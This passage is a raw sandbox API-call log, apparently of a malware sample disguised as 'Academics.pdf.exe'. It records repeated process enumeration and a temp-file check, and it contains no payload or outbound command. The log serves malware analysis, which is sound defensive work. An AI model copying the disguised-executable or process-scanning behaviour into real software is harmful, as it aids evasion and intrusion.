th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0288.532] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0288.533] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0288.533] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0288.534] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0288.535] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0288.536] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0288.537] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0288.538] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0288.539] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0288.539] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0 [0288.540] CloseHandle (hObject=0x294) returned 1 [0288.540] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0288.540] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0288.541] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0288.543] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0288.543] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0288.544] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0288.545] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0288.546] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0288.547] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0288.548] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0288.549] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0288.550] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0288.551] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0288.551] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0288.552] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0288.553] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0288.554] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0288.555] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0288.556] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0288.557] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0288.558] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0288.559] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0288.559] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0288.560] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0288.561] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0288.562] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0288.563] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0288.564] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0288.565] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0288.566] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0288.566] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0288.567] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0288.568] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0288.569] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0288.570] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0288.571] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0288.572] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0288.573] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0288.573] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0288.574] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0288.575] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0288.576] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0288.577] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0288.578] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0288.579] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0288.579] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0288.580] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0288.581] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0288.582] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0288.583] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0288.584] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0288.584] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0 [0288.586] CloseHandle (hObject=0x294) returned 1 [0288.586] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0288.586] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0288.586] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0288.588] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0288.589] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0288.590] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0288.591] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0288.592] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0288.593] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0288.594] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0288.594] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0288.595] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0288.596] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0288.613] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0288.613] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0288.613] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0288.613] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0288.613] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8bf2a0 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\") returned 0x25 [0288.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0288.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0288.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0288.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0288.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0288.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0288.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0288.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0288.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0288.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0288.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0288.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0288.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0288.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0288.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0288.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0288.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xb0) returned 0x24207f0 [0288.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0288.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0288.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0288.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0288.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0288.615] GetFileAttributesW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp/8x8x8" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\8x8x8")) returned 0x2020 [0288.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0288.615] 